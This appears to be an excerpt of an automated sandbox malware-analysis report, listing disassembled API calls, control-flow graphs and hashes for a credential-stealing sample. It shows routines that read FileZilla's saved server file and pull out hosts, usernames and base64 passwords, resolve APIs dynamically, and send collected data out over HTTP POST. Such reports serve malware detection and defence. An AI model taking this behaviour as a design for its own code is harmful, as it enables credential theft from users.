                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407561
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6D48), ref: 00407574
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6B98), ref: 00407588
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8470), ref: 0040759C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8350), ref: 004075AF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F82B8), ref: 004075C3
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004075D7
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004075EB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004075FF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6D48), ref: 00407613
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6B98), ref: 00407626
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8470), ref: 0040763A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8350), ref: 0040764E
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,00000000), ref: 00407018
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020, : ), ref: 0040702A
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,00000000), ref: 0040705F
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,00000000), ref: 004070A3
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F0A18), ref: 004077DB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F7640), ref: 004077EE
                                                                                                                                                                                                                              • lstrlen.KERNEL32(3095D020), ref: 004077FB
                                                                                                                                                                                                                              • lstrlen.KERNEL32(3095D020), ref: 0040780B
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3958002797-0
                                                                                                                                                                                                                              • Opcode ID: 1deb68fe007c3a931c0a137675a9dba7412e12439f4df884cae112fa19bd3d59
                                                                                                                                                                                                                              • Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1deb68fe007c3a931c0a137675a9dba7412e12439f4df884cae112fa19bd3d59
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 804 40ea90-40eb22 call 416d40 call 4154e0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416da0 call 4093a0 826 40eb27-40eb2c 804->826 827 40ef60-40ef73 call 416e00 call 413220 826->827 828 40eb32-40eb49 call 415530 826->828 828->827 834 40eb4f-40ebaf strtok_s call 416d40 * 4 GetProcessHeap HeapAlloc 828->834 844 40ebb2-40ebb6 834->844 845 40eeca-40ef5b lstrlen call 416da0 call 401500 call 404dc0 call 416e00 memset call 417040 * 4 call 416e00 * 4 844->845 846 40ebbc-40ebcd StrStrA 844->846 845->827 847 40ec06-40ec17 StrStrA 846->847 848 40ebcf-40ec01 lstrlen call 414fa0 call 416ea0 call 416e00 846->848 851 40ec50-40ec61 StrStrA 847->851 852 40ec19-40ec4b lstrlen call 414fa0 call 416ea0 call 416e00 847->852 848->847 857 40ec63-40ec95 lstrlen call 414fa0 call 416ea0 call 416e00 851->857 858 40ec9a-40ecab StrStrA 851->858 852->851 857->858 860 40ecb1-40ed03 lstrlen call 414fa0 call 416ea0 call 416e00 call 4170d0 call 4094a0 858->860 861 40ed39-40ed4b call 4170d0 lstrlen 858->861 860->861 905 40ed05-40ed34 call 416e20 call 416fb0 call 416ea0 call 416e00 860->905 879 40ed51-40ed63 call 4170d0 lstrlen 861->879 880 40eeaf-40eec5 strtok_s 861->880 879->880 891 40ed69-40ed7b call 4170d0 lstrlen 879->891 880->844 891->880 899 40ed81-40ed93 call 4170d0 lstrlen 891->899 899->880 909 40ed99-40eeaa lstrcat * 3 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 416e20 * 4 899->909 905->861 909->880
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                                                                                                                                                • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                                                                                                                                                • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040EF17
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                                                                              • API String ID: 1266801029-555421843
                                                                                                                                                                                                                              • Opcode ID: 69bd349b282df7ba6b8db11135eb5aaf6ea59cc80ae1b81a19c62369651b1021
                                                                                                                                                                                                                              • Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69bd349b282df7ba6b8db11135eb5aaf6ea59cc80ae1b81a19c62369651b1021
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 939 415ed0-415ee4 call 415dc0 942 416103-416162 LoadLibraryA * 5 939->942 943 415eea-4160fe call 415df0 GetProcAddress * 21 939->943 945 416164-416178 GetProcAddress 942->945 946 41617d-416184 942->946 943->942 945->946 948 4161b6-4161bd 946->948 949 416186-4161b1 GetProcAddress * 2 946->949 950 4161d8-4161df 948->950 951 4161bf-4161d3 GetProcAddress 948->951 949->948 952 4161e1-4161f4 GetProcAddress 950->952 953 4161f9-416200 950->953 951->950 952->953 954 416231-416232 953->954 955 416202-41622c GetProcAddress * 2 953->955 955->954
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D2910), ref: 00415F11
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D29A0), ref: 00415F2A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D2958), ref: 00415F42
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D2940), ref: 00415F5A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D2970), ref: 00415F73
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042EEF30), ref: 00415F8B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D3F78), ref: 00415FA3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D41D8), ref: 00415FBC
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F0638), ref: 00415FD4
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F0530), ref: 00415FEC
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F05F0), ref: 00416005
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F05D8), ref: 0041601D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D3FF8), ref: 00416035
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F03F8), ref: 0041604E
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F0428), ref: 00416066
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D4138), ref: 0041607E
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F04E8), ref: 00416097
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F0548), ref: 004160AF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D4018), ref: 004160C7
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042F0398), ref: 004160E0
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,042D4078), ref: 004160F8
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F0500,?,004136C0), ref: 0041610A
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F0650,?,004136C0), ref: 0041611B
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F0518,?,004136C0), ref: 0041612D
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F04A0,?,004136C0), ref: 0041613F
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(042F0608,?,004136C0), ref: 00416150
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,042F04D0), ref: 00416172
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,042F05A8), ref: 00416193
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,042F0668), ref: 004161AB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,042F0620), ref: 004161CD
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75450000,042D3F98), ref: 004161EE
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76E90000,042EEF40), ref: 0041620F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • NtQueryInformationProcess, xrefs: 0041621A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                              • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                              • API String ID: 2238633743-2781105232
                                                                                                                                                                                                                              • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                              • Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 956 404dc0-404ee1 call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA 979 404ee3 956->979 980 404eea-404eee 956->980 979->980 981 404ef4-405007 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 980->981 982 405578-40560a InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00 980->982 981->982 1045 40500d-40501b 981->1045 1046 405029 1045->1046 1047 40501d-405027 1045->1047 1048 405033-405065 HttpOpenRequestA 1046->1048 1047->1048 1049 40556b-405572 InternetCloseHandle 1048->1049 1050 40506b-4054e5 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070 1048->1050 1049->982 1204 4054ea-405514 InternetReadFile 1050->1204 1205 405516-40551d 1204->1205 1206 40551f-405565 InternetCloseHandle 1204->1206 1205->1206 1207 405521-40555f call 416fb0 call 416ea0 call 416e00 1205->1207 1206->1049 1207->1204
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9
                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,042F0A48,?,042F84A0,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,042F0A78,00000000,?,042F7B58,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00405417
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405443
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040546A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 004054A5
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                                                                              • String ID: ------$"$"$"$--$------$------$------$J&f
                                                                                                                                                                                                                              • API String ID: 2633831070-3705675087
                                                                                                                                                                                                                              • Opcode ID: 465e31c50ca583c8e17bae36ce337e8ad2033ac8c63f841b0aa9da903d8ddf65
                                                                                                                                                                                                                              • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 465e31c50ca583c8e17bae36ce337e8ad2033ac8c63f841b0aa9da903d8ddf65
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
